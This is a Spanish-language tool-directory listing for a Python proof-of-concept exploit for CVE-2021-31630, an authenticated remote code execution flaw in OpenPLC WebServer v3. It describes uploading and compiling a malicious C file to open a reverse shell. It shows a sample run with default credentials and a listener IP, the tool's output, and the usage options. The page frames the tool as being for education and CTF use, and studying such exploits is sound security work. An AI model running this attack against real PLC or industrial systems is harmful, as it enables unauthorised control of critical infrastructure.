Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-31630 — Exploit PoC para CVE-2021-31630 escrito en Python3 y usando reverse shell en C con modo no bloqueante. | Kitploit
Herramientas/GitHubGitHub/flojboj/cve-2021-31630
ExplotaciónSeguridad SCADA/ICSExplotación de Aplicaciones WebCTFAprendizaje y EducaciónDesarrollo de Payloads
GitHubflojboj/cve-2021-31630

CVE-2021-31630

Exploit PoC para CVE-2021-31630 escrito en Python3 y usando reverse shell en C con modo no bloqueante.

Ver Repositorio
4hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

OpenPLC WebServer v3 - RCE Autenticado (CVE-2021-31630)


Este exploit está basado en el exploit de Exploit-DB hecho por Fellipe Oliveira.

  • Primero, autenticarse
  • Subir un archivo C malicioso
  • Compilarlo
  • Iniciar el PLC (iniciar reverse shell)
  • Detener el PLC (no es necesario ejecutarlo, la reverse shell ya se ha iniciado)
root@kitploit:~
└─# python3 custom_exploit.py --url http://10.10.11.7:8080 --username openplc --password openplc --listenerip 10.10.16.4 --listenerport 8888
[*] Authenticated.
[*] C file uploaded. Waiting for compilation.
[*] Compiled, probably.
[*] Started PLC, you should get your reverse shell now.
[*] Stopped PLC.

Cómo usar

root@kitploit:~
python3 exploit.py --url <> --username <> --password <> --listenerip <> --listenerport <>

Opciones:

  • --url - URL del OpenPLC
  • --username - nombre de usuario
  • --password - contraseña
  • --listenerip - dirección IP del listener
  • --listenerport - puerto del listener
  • NOTA: Este exploit se creó como PoC; úselo solo con fines educativos o CTFs - https://flojboj.org/article/WifineticTwo

    Descargar herramienta